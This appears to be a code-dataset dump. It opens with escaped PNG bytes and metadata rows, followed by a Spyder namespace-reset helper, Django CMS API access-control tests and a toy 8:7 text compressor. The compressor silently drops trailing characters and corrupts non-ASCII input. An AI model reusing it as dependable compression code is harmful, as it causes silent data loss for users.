Dh\xd3\xa6\rO=\xf5\x94*[\x95\xc77\x05(\x11t\xb7\xdcr\x8b\'[o\x17\x98\x07xUX@\x8d\xe0\xddVD\x88\x8b\x8b\x131\xf3!Njj\xaa\xaa\xc2\x97\x9b7o\x16\x05+\xdd\x90\x95\x95\xc5\x93O>\xc9\xf0\xe1\xc3\xd5\x06\xd5\\\xcc\x12\xc0\xeb:aj\x04\xef\xb6\nD\xa8W\x86\x11(L\x9c\xe8>!\xb1\xc3\xe1p\x9bp#\\9u\xea\x14\xcf=\xf7\x1c\xbd{\xf7\xe6\x93O>\xf1\xa6\xa8\xe7*\xe0V\xc0\xeb\x85\x125\x82/tgp\xf6\xac\xdb\x00\x1fA\x08\xd0\xaaU+\xae\xb9\xe6\x1a\xb7vk\xd6\xac\xf1\x837\xc1\x81\xddng\xe5\xca\x95\xdc}\xf7\xdd\xf4\xe9\xd3\x87\xc5\x8b\x17\xab=\xf5V\x96%(e\xda\xec\xbe\xf8\xa3\xe68\x9b\xdbe\xc3\xbc\xbc<\xecv\xbb\x98\xd6\x87\x01\xbd{\xf7f\xe3\xc6\x8dU\xdax1M\r\x19\xecv;\x07\x0f\x1ed\xf3\xe6\xcd\x7f]*\xeb\xc0U\xc5<\x94i\xbc\xcf[ j\x02o,@1`\xae\xcan\xcd\x9a5\xd4\xab\xa7Y\xb1\x19\x81A9~\xfc8}\xfa\xf4\xa9\xd2\xc6f\xb3\xa9J\x91\x1d\xec8\x1c\x0e\n\n\n((( 
\'\'\x87\xc3\x87\x0fs\xfc\xf8q-\xb7&\x1d(\xab\xf1^W\xfe\xf46\xd2\xee\x00Pe\xdc\xe4{\xef\xbdG\x97.]\xbc\xf5K\x10D\xb4m\xdb\xd6\xdbi\xa9@=GP\xf6\xd9=\xdez\xbb\x18o#\xed\xf6\xbb3P\x99\\O\x10\x02$$$\x04\xda\x85Pg\tp\x15>\x8a\xbd"\xd4\n\xdemP\xb581\x15>\x88\x1c\x85\xba\x91\x8er\x10\xc6\xe3\x08:\xb5\xa8\x15\xfc:w\x06\x87\x0e\x1d\xd2%\xd9\x82\xc0x\xe4\xe6\xea\xf2Y\x0cg\xce\xa2\xe4\x8alE%\xa7\xde\xb4B\xad\xe0\x7f\x04\xdcfRP\x99wK\x10\xe4df\x96+J*\xf0\x8e,\xe0\xffP\x8a\xb1>\x07\xe8\xbe0\xa2V\xf0\xf9\x80\xdb9\xfb\xe2\xc5\x8b9s\xe6\x8co\x1e\t\x0c\xcd\xf1\xe3\xc7\xb1\xdb}\xda\n\x16(\xa9\xa4\'\xa0\x9cQ\x99\x86\x8aL5Z\xe1I\x8a\xab\xf7\xdd\x19\x94\x94\x940o\xde<\x1f\xdc\x11\x18\x9du\xeb\xd6\x05\xda\x85`DFY\x07{\x0e\xe5\xe4\xe95\xc0\x02\xdc$\x9c\xd4\x03O\x04\xff9p\xce\x9d\xd1\xb2e\xcb\xf8\xed\xb7\xdf\xbcvH`lD\x14\x9d*rQ\xee\xe2\x0b\x804\x94\xea\xcamQ\x9e\xd3\xf5\xcf;V\x05j\xf7\xe1/0\x15\xe5[\xaaJ\xea\xd4\xa9\xc3\xb2e\xcbD\xaa\xea\x10\xe3\xd7_\x7fe\xe8\xd0\xa1jL\x97\x00{tv\xc7\x08\x94\xa0D\xa2^\xb82\x80}\x80a\x169\xbc\r\xbc\xb9@4J\x10\x8e\xdbL\x95\x9d:ub\xe1\xc2\x85\xa2\x18E\x081f\xcc\x18\xfe\xfb\xdf\xff\xba3\xb3\x03\t\xa8\x08\xc9\x16\xe8\x8f\xb7\x817\x17(@)\x13\xed\x96\xad[\xb7\xf2\xe8\xa3\x8f\x8a\x05\x9e\x10a\xd9\xb2ej\xc4\x0eJ]r!v\x83\xe2\xe9\x1d\x1e\x94\xea\xb1{PYPRT\x8f\r~v\xed\xda\xc5\xc8\x91#q8\x1cj\xccG\x00\x1f\xe9\xec\x92@%\xbe\xde\xe1A\t\xe8\x9f\xa4\xd6\xf8\xe7\x9f\x7f&---\xacOP\x053?\xff\xfc3\xe3\xc6\x8dS+\xf6]\xc0\':\xbb$\xf0\x01o\x04\x0fJ\xc1\xf9ij\x8d\x8f\x1d;Fjj*\x8f=\xf6\x98\xd8\xa7\x0f"\x96.]\xca\xe8\xd1\xa3\xc9\xcb\xcbS\xdb\xe4Q48\xc2)\xd0\x0fo\xa6\xf4\x170\x01\xcb\x81\x9b<\x19022\x92\x11#F0`\xc0\x00Z\xb5j\xe5IS\x81\x9f\xf0&/=\xf0\x03p\x9dN.\t\xbc\xc4\xd7U\xfa\xb2TG9\xd1\xd3\xc2\x1bg\xea\xd4\xa9C\xdf\xbe}i\xdb\xb6-\x89\x89\x89$&&\x92\x94\x94Ddd\xa47\xdd\t\xbc@\x8b\xca3(\xf1\x19]\x80\xbd\xda{(\xf0\x05\xad\x05\x0fJ\xe4\xd0\x8f(\xc1\x05\x82\xf0C\x06\x06\x01+\x02\xed\x88\xa0<Z,\xda\x95e?\xd0\x19\xf8U\x83\xbe\x04\xc1\xc7\xe3\x08\xb1\x07\x0f\xb2,Wyy@,\xf0%\xca7\xbe\xb8\x
c2\xe3z\x1d\x81\xa1)\xa7g\r\x05\x0f\xca\x8ca6\x81\xff \x8aK\xdf\xcb\t<\x84\xc0\xf0\xe8-\xf8\x0b\xfc\x1d8N\xe0?\x98\xe2\xd2\xfe:\x8f\x87;3\x82\xc0\xe1/\xc1\x832\xc5\x7f\x01%\xaf}\xa0?\xa4\xe2\xd2\xe6\xfa\x1c\xb8\x1cA\xd0\xe0O\xc1_ \x11\x98\x85rd0\xd0\x1fXqywm\x06\xba\x97\xfd\xc3\n\x8cO \x04\x7f\x01\x1b\xca\xd9\xe0/P\xa6\x85\x81\xfe\x10\x8b\xab\xea+\x03x\x0b%\xa9\xa2\xdb\xbdY\x811)\xabg-\xf6\xe1\xbd\xc1\x8a\x12\xa8\xd1\x15%h\xa7\x05P\x0f\xe51 \x16u\x15q\x04\xdaP\x00\x9c\xbc\xe8:\x0c|\x03\xfc\x17\x11&\x1b\xf4x\x1cx#\x10\x08B\x07-\x02o\x04\x02A\x90 \x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11B\xf0\x02A\x18!\x04/\x10\x84\x11\xff\x0f\xe2G*\x19a\x16\x83;\x00\x00\x00\x00IEND\xaeB`\x82' # noqa: E501
| 1,149.537037 | 40,582 | 0.805075 | 10,008 | 62,075 | 4.985811 | 0.260392 | 0.002164 | 0.001443 | 0.002245 | 0.020261 | 0.015692 | 0.01487 | 0.012205 | 0.008557 | 0.007155 | 0 | 0.20244 | 0.008151 | 62,075 | 53 | 40,583 | 1,171.226415 | 0.607968 | 0.000338 | 0 | 0.142857 | 0 | 0.714286 | 0.742696 | 0.728449 | 0 | 1 | 0 | 0 | 0.142857 | 1 | 0.095238 | false | 0 | 0.071429 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8611c69fa6ef831457a8dbe8a56cce0b7b4729f0 | 81 | py | Python | spyder_reset_clear.py | pdubucq/gists | 77b933e66343d262e142d0c34b7e5e432d74b311 | [
"MIT"
] | null | null | null | spyder_reset_clear.py | pdubucq/gists | 77b933e66343d262e142d0c34b7e5e432d74b311 | [
"MIT"
] | null | null | null | spyder_reset_clear.py | pdubucq/gists | 77b933e66343d262e142d0c34b7e5e432d74b311 | [
"MIT"
] | null | null | null | from IPython import get_ipython
def __reset__(): get_ipython().magic('reset -sf') | 40.5 | 49 | 0.777778 | 12 | 81 | 4.75 | 0.666667 | 0.350877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08642 | 81 | 2 | 49 | 40.5 | 0.77027 | 0 | 0 | 0 | 0 | 0 | 0.109756 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
862c85085884897a5a45a50b70b1cf30b645b183 | 17,449 | py | Python | example_project/example_site/tests/test_base.py | wearehoods/djangocms-rest-api | 7ac95b683e24bfdb61a2a2d73c9d018a190d51f8 | [
"MIT"
] | 55 | 2016-08-04T19:08:01.000Z | 2020-07-27T06:43:35.000Z | example_project/example_site/tests/test_base.py | wearehoods/djangocms-rest-api | 7ac95b683e24bfdb61a2a2d73c9d018a190d51f8 | [
"MIT"
] | 14 | 2016-10-03T19:44:19.000Z | 2019-01-17T13:18:24.000Z | example_project/example_site/tests/test_base.py | wearehoods/djangocms-rest-api | 7ac95b683e24bfdb61a2a2d73c9d018a190d51f8 | [
"MIT"
] | 18 | 2016-09-30T03:20:43.000Z | 2021-03-03T07:20:01.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
from __future__ import with_statement
from django.core.cache import cache
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from cms.api import create_page, add_plugin
from cms.models import User
from filer.models import Image
from rest_framework import status
from example_site.tests.utils import CMSApiTestCase
from plugins.models import Slide
class PagesTestCase(CMSApiTestCase):
    """Tests for the ``api:page-list`` endpoint.

    Verifies that anonymous clients only see published pages, while an
    admin user sees drafts as well.
    """

    def tearDown(self):
        # django CMS caches page/menu data between requests; clear it so
        # each test starts from a clean slate.
        cache.clear()

    def _create_pages(self):
        """Create the shared fixture used by both list tests.

        Creates two published pages (the second nested under the first)
        and one unpublished draft.

        :return: tuple ``(published_titles, draft_title)`` where
            ``published_titles`` is the set of the two published titles.
        """
        title_1 = 'page'
        title_2 = 'inner'
        title_3 = 'page 3'
        parent = create_page(title_1, 'page.html', 'en', published=True).publisher_public
        create_page(title_2, 'page.html', 'en', published=True, parent=parent)
        create_page(title_3, 'page.html', 'en', published=False)
        return {title_1, title_2}, title_3

    def test_page_list_unauthorised(self):
        """
        Anonymous users can access only the published pages via the API.
        """
        # NOTE(review): no login happens in this test, so the superuser
        # object itself is unused; the call is kept from the original in
        # case it creates DB state the fixture relies on — TODO confirm
        # and drop if unnecessary.
        self.get_superuser()
        published_titles, _ = self._create_pages()
        url = reverse('api:page-list')
        response = self.client.get(url, format='json')
        # Only the two published pages are listed; the draft is hidden.
        self.assertEqual(len(response.data), 2)
        for page in response.data:
            self.assertIn(page.get('title'), published_titles)

    def test_page_list_admin(self):
        """
        Admin users can access all pages (published and drafts) via the API.
        """
        user = self.get_superuser()
        published_titles, draft_title = self._create_pages()
        with self.login_user_context(user):
            url = reverse('api:page-list')
            response = self.client.get(url, format='json')
            # All three pages, including the unpublished draft, are listed.
            self.assertEqual(len(response.data), 3)
            for page in response.data:
                self.assertIn(page.get('title'), published_titles | {draft_title})
class PlaceHolderTestCase(CMSApiTestCase):
    """API tests for placeholder visibility: published pages, drafts and
    login-protected pages, for anonymous, authenticated and staff users."""

    def test_placeholder(self):
        """
        Test that a placeholder on a published page is accessible and
        exposes the ids of the plugins it holds.
        """
        page = create_page('page', 'page.html', 'en', published=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
        response = self.client.get(url)
        self.assertEqual(len(response.data['plugins']), 1)
        self.assertEqual(response.data['plugins'][0], plugin.id)

    def test_anonymous_cant_see_placeholder_from_draft(self):
        """
        Tests that an anonymous user gets a forbidden error when trying to
        load a placeholder from a page that is not published.
        """
        page = create_page('page', 'page.html', 'en', published=False)
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        self.assertNotIn('plugins', response.data)

    def test_anonymous_cant_see_placeholder_from_page_for_authenticated_only(self):
        """
        Tests that an anonymous user gets a forbidden error when trying to
        load a placeholder from a page which is available only to logged
        in users.
        """
        page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        self.assertNotIn('plugins', response.data)

    def test_authenticated_can_see_placeholder_from_page_for_authenticated_only(self):
        """
        Tests that an authenticated user CAN load a placeholder from a
        published page which is available only to logged in users.
        (The original docstring wrongly claimed a forbidden error.)
        """
        page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        user = User.objects.create(username='testuser', email='testuser@example.com')
        user.set_password('testuser')
        self.client.force_authenticate(user)
        url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertIn('plugins', response.data)
        self.assertEqual(response.data['plugins'][0], plugin.id)

    def test_authenticated_cant_see_placeholder_from_drafts(self):
        """
        Tests that a regular authenticated user gets a forbidden error when
        trying to load a placeholder from an unpublished (draft) page.
        """
        page = create_page('page', 'page.html', 'en', published=False, login_required=True)
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        user = User.objects.create(username='testuser', email='testuser@example.com')
        user.set_password('testuser')
        self.client.force_authenticate(user)
        url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_staff_can_not_see_placeholder_from_not_published_pages_for_authenticated(self):
        """
        Tests that a staff user (with no further permissions) still gets a
        forbidden error when loading a placeholder from an unpublished page.
        (The original docstring wrongly claimed staff could access it.)
        """
        page = create_page('page', 'page.html', 'en', published=False, login_required=True)
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        user = User.objects.create(username='testuser', email='testuser@example.com', is_staff=True)
        user.set_password('testuser')
        self.client.force_authenticate(user)
        url = reverse('api:placeholder-detail', kwargs={'pk': placeholder.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class PluginTestCase(CMSApiTestCase):
    """API tests for the plugin-detail endpoint: serialization of plugin
    data, inlines, nested children, and visibility rules for anonymous,
    authenticated and staff users."""

    def test_plugin_detail(self):
        """A plugin on a published page exposes its type and data."""
        page = create_page('page', 'page.html', 'en', published=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin_1 = add_plugin(
            placeholder, 'GoogleMapPlugin', 'en', title="Map Plugin")
        url = reverse('api:plugin-detail', kwargs={'pk': plugin_1.id})
        response = self.client.get(url, format='json')
        self.assertEqual(response.data['plugin_type'], 'GoogleMapPlugin')
        self.assertEqual(response.data['plugin_data']['title'], plugin_1.title)

    def test_plugin_with_inlines(self):
        """Inline model instances attached to a plugin are serialized."""
        page = create_page('page', 'page.html', 'en', published=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, 'SliderWithInlinesPlugin', 'en', name='Slider')
        instance, plugin_model = plugin.get_plugin_instance()
        image1 = SimpleUploadedFile("image.jpg", b"content")
        image2 = SimpleUploadedFile("image.jpg", b"content")
        slide_1 = Slide.objects.create(title='slide 1', image=image1, slider=instance)
        slide_2 = Slide.objects.create(title='slide 2', image=image2, slider=instance)
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.id})
        response = self.client.get(url, format='json')
        self.assertEqual(len(response.data['inlines']), 1)
        self.assertEqual(len(response.data['inlines']['slides']), 2)
        self.assertIn(slide_1.image.url, response.data['inlines']['slides'][0]['image'])

    def test_plugin_with_children(self):
        """Nested child plugins are serialized recursively under 'children'."""
        page = create_page('page', 'page.html', 'en', published=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        columns = add_plugin(placeholder, "MultiColumnPlugin", "en")
        column_1 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='10%')
        column_2 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='30%')
        text_plugin_1_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the first")
        text_plugin_1_2 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the second")
        text_plugin_2_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_2, body="I'm the third")
        url = reverse('api:plugin-detail', kwargs={'pk': columns.id})
        response = self.client.get(url, format='json')
        data = response.data
        self.assertIn('children', data)
        self.assertEqual(len(data['children']), 2)
        self.assertEqual(len(data['children'][0]['children']), 2)
        self.assertEqual(data['children'][0]['children'][0]['body'], text_plugin_1_1.body)
        self.assertEqual(data['children'][0]['children'][1]['body'], text_plugin_1_2.body)
        self.assertEqual(len(data['children'][1]['children']), 1)
        self.assertEqual(data['children'][1]['children'][0]['body'], text_plugin_2_1.body)

    def test_plugin_with_children_with_inlines(self):
        """Child plugins that carry inlines keep them in the nested output."""
        page = create_page('page', 'page.html', 'en', published=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        columns = add_plugin(placeholder, "MultiColumnPlugin", "en")
        column_1 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='10%')
        column_2 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='30%')
        column_3 = add_plugin(placeholder, "ColumnPlugin", "en", target=columns, width='60%')
        text_plugin_1_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the first")
        text_plugin_1_2 = add_plugin(placeholder, "TextPlugin", "en", target=column_1, body="I'm the second")
        text_plugin_2_1 = add_plugin(placeholder, "TextPlugin", "en", target=column_2, body="I'm the third")
        plugin = add_plugin(placeholder, 'SliderWithInlinesPlugin', 'en', target=column_3, name='Slider')
        instance, plugin_model = plugin.get_plugin_instance()
        image1 = SimpleUploadedFile("image.jpg", b"content")
        image2 = SimpleUploadedFile("image.jpg", b"content")
        slide_1 = Slide.objects.create(title='slide 1', image=image1, slider=instance)
        slide_2 = Slide.objects.create(title='slide 2', image=image2, slider=instance)
        url = reverse('api:plugin-detail', kwargs={'pk': columns.id})
        response = self.client.get(url, format='json')
        data = response.data
        self.assertIn('children', data)
        self.assertEqual(len(data['children']), 3)
        self.assertEqual(len(data['children'][0]['children']), 2)
        self.assertEqual(data['children'][0]['children'][0]['body'], text_plugin_1_1.body)
        self.assertEqual(data['children'][0]['children'][1]['body'], text_plugin_1_2.body)
        self.assertEqual(len(data['children'][1]['children']), 1)
        self.assertEqual(data['children'][1]['children'][0]['body'], text_plugin_2_1.body)
        self.assertIn('inlines', data['children'][2]['children'][0])
        self.assertIn('slides', data['children'][2]['children'][0]['inlines'])
        self.assertEqual(len(data['children'][2]['children'][0]['inlines']['slides']), 2)

    def test_plugin_mapping(self):
        """Related objects (e.g. a filer image) serialize as nested dicts."""
        page = create_page('page', 'page.html', 'en', published=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        image = Image.objects.create(file=SimpleUploadedFile("image.jpg", b"content"))
        plugin = add_plugin(placeholder, "FilerImagePlugin", "en", image=image)
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.id})
        response = self.client.get(url, format='json')
        data = response.data
        self.assertIsNotNone(data['image'])
        self.assertTrue(isinstance(data['image'], dict))
        # TODO: check urls
        self.assertIn(image.url, data['image']['file'])

    def test_custom_serializer_detail(self):
        """A plugin with a custom serializer exposes its extra fields."""
        page = create_page('page', 'page.html', 'en', published=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, 'SliderPlugin', 'en', name='Slider')
        instance, plugin_model = plugin.get_plugin_instance()
        # Fixed: the original assigned `image` twice in a row; the first
        # assignment was dead code.  Both slides share the same upload.
        image = SimpleUploadedFile("image.jpg", b"content")
        slide_1 = Slide.objects.create(title='slide 1', image=image, slider=instance)
        slide_2 = Slide.objects.create(title='slide 2', image=image, slider=instance)
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.id})
        response = self.client.get(url, format='json')
        self.assertIn('test', response.data)

    def test_anonymous_cant_see_plugin_from_draft(self):
        """
        Tests that an anonymous user gets a forbidden error when trying to
        load a plugin from a page that is not published.
        """
        page = create_page('page', 'page.html', 'en', published=False)
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_anonymous_cant_see_plugin_from_page_for_authenticated_only(self):
        """
        Tests that an anonymous user gets a forbidden error when trying to
        load a plugin from a page which is available only to logged in
        users.
        """
        page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_authenticated_can_see_plugin_from_page_for_authenticated_only(self):
        """
        Tests that an authenticated user CAN load a plugin from a published
        page which is available only to logged in users.
        (The original docstring wrongly claimed a forbidden error.)
        """
        page = create_page('page', 'page.html', 'en', published=True, login_required=True).publisher_public
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        user = User.objects.create(username='testuser', email='testuser@example.com')
        user.set_password('testuser')
        self.client.force_authenticate(user)
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertIn('plugin_type', response.data)
        self.assertEqual(response.data['plugin_type'], 'TextPlugin')

    def test_authenticated_cant_see_plugin_from_drafts(self):
        """
        Tests that a regular authenticated user gets a forbidden error when
        trying to load a plugin from an unpublished (draft) page.
        """
        page = create_page('page', 'page.html', 'en', published=False, login_required=True)
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        user = User.objects.create(username='testuser', email='testuser@example.com')
        user.set_password('testuser')
        self.client.force_authenticate(user)
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_staff_can_not_see_plugin_from_not_published_pages_for_authenticated(self):
        """
        Tests that a staff user (with no further permissions) still gets a
        forbidden error when loading a plugin from an unpublished page.
        (The original docstring wrongly claimed staff could access it.)
        """
        page = create_page('page', 'page.html', 'en', published=False, login_required=True)
        placeholder = page.placeholders.get(slot='content')
        plugin = add_plugin(placeholder, "TextPlugin", "en", body="Test text")
        user = User.objects.create(username='testuser', email='testuser@example.com', is_staff=True)
        user.set_password('testuser')
        self.client.force_authenticate(user)
        url = reverse('api:plugin-detail', kwargs={'pk': plugin.pk})
        response = self.client.get(url)
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| 52.557229 | 109 | 0.668348 | 2,145 | 17,449 | 5.279254 | 0.087179 | 0.02402 | 0.051219 | 0.038591 | 0.883168 | 0.860297 | 0.831862 | 0.823561 | 0.815525 | 0.815525 | 0 | 0.011463 | 0.195083 | 17,449 | 331 | 110 | 52.716012 | 0.794802 | 0.076795 | 0 | 0.711297 | 0 | 0 | 0.15102 | 0.011352 | 0 | 0 | 0 | 0.003021 | 0.200837 | 1 | 0.083682 | false | 0.025105 | 0.046025 | 0 | 0.142259 | 0.004184 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
86707c149d38ddb2a3dd510a091fef92893eee78 | 2,317 | py | Python | ravdec.py | mr-ravin/ravdec | f20e3cb5b09436b76da30eb671b0367d34d03aa7 | [
"MIT"
] | 2 | 2019-05-05T22:56:57.000Z | 2020-12-10T01:39:42.000Z | ravdec.py | mr-ravin/ravdec | f20e3cb5b09436b76da30eb671b0367d34d03aa7 | [
"MIT"
] | null | null | null | ravdec.py | mr-ravin/ravdec | f20e3cb5b09436b76da30eb671b0367d34d03aa7 | [
"MIT"
def file_compression(filename):
    """Compress a text file with Ravdec fixed 8:7 bit packing.

    Every group of 8 input characters (assumed 7-bit ASCII) is re-encoded
    as 7 output characters: the 7-bit binary form of each character is
    concatenated and the resulting bit string is re-sliced into 8-bit
    chunks.  The output is written next to the input as ``<name>.rav``.

    NOTE(review): characters with ``ord(ch) >= 128`` yield more than 7 bits
    and silently corrupt the stream, and any trailing ``len(data) % 8``
    characters are dropped -- both quirks are part of the original format
    and are preserved here for compatibility.

    :param filename: path of the text file to compress; the ``.rav`` name
        is derived from everything before the first ``.``.
    """
    # `with` guarantees the handles are closed even if an error occurs
    # (the original closed them manually and leaked on exceptions).
    with open(filename, 'r') as read_file:
        read_data = read_file.read()
    out_name = filename.split('.')[0] + '.rav'
    groups = len(read_data) // 8  # only whole 8-char groups are encoded
    # Concatenate the zero-padded 7-bit representation of each character.
    # str.join avoids the quadratic `binval += bits` of the original.
    binval = "".join(
        bin(ord(ch))[2:].zfill(7) for ch in read_data[:groups * 8]
    )
    # Re-slice the bit stream into 8-bit characters and write them out.
    with open(out_name, 'w') as wrt_file:
        for pos in range(0, len(binval), 8):
            wrt_file.write(chr(int(binval[pos:pos + 8], 2)))
def file_decompression(filename):
    """Decompress a Ravdec ``.rav`` file back to its original text.

    Inverse of :func:`file_compression`: every group of 7 compressed
    characters is expanded to 8-bit binary, concatenated, and re-sliced
    into 7-bit chunks; each chunk (with a leading ``0`` bit) becomes one
    output character.  The result is written next to the input as
    ``<name>.dec``.

    NOTE(review): any trailing ``len(data) % 7`` characters are dropped,
    mirroring the original format.

    :param filename: path of the ``.rav`` file; the ``.dec`` name is
        derived from everything before the first ``.``.
    """
    # `with` guarantees the handles are closed even on error.
    with open(filename, 'r') as read_file:
        read_data = read_file.read()
    out_name = filename.split('.')[0] + '.dec'
    groups = len(read_data) // 7  # only whole 7-char groups are decoded
    # Concatenate the zero-padded 8-bit representation of each character.
    binval = "".join(
        bin(ord(ch))[2:].zfill(8) for ch in read_data[:groups * 7]
    )
    # Re-slice into 7-bit chunks; the prepended '0' restores the ASCII
    # high bit dropped during compression.
    with open(out_name, 'w') as wrt_file:
        for pos in range(0, len(binval), 7):
            wrt_file.write(chr(int('0' + binval[pos:pos + 7], 2)))
def net_compression(read_data):
    """Compress a string in memory with Ravdec fixed 8:7 bit packing.

    Same algorithm as :func:`file_compression` but operating on strings,
    intended for network payloads: each group of 8 characters (assumed
    7-bit ASCII) becomes 7 output characters.

    NOTE(review): characters with ``ord(ch) >= 128`` corrupt the bit
    stream and trailing ``len(read_data) % 8`` characters are dropped --
    preserved from the original format.

    :param read_data: string to compress.
    :return: compressed string (7/8 the length of the processed input).
    """
    groups = len(read_data) // 8  # only whole 8-char groups are encoded
    # str.join avoids the quadratic `+=` accumulation of the original.
    bit_stream = "".join(
        bin(ord(ch))[2:].zfill(7) for ch in read_data[:groups * 8]
    )
    return "".join(
        chr(int(bit_stream[pos:pos + 8], 2))
        for pos in range(0, len(bit_stream), 8)
    )
def net_decompression(read_data):
    """Decompress a Ravdec-packed string in memory.

    Inverse of :func:`net_compression`: each group of 7 compressed
    characters is expanded to 8-bit binary, re-sliced into 7-bit chunks,
    and each chunk (with a leading ``0`` bit) becomes one output
    character.

    NOTE(review): trailing ``len(read_data) % 7`` characters are dropped,
    mirroring the original format.

    :param read_data: compressed string as produced by net_compression.
    :return: the decompressed string.
    """
    groups = len(read_data) // 7  # only whole 7-char groups are decoded
    # str.join avoids the quadratic `+=` accumulation of the original.
    bit_stream = "".join(
        bin(ord(ch))[2:].zfill(8) for ch in read_data[:groups * 7]
    )
    # The prepended '0' restores the high bit dropped during compression.
    return "".join(
        chr(int('0' + bit_stream[pos:pos + 7], 2))
        for pos in range(0, len(bit_stream), 7)
    )
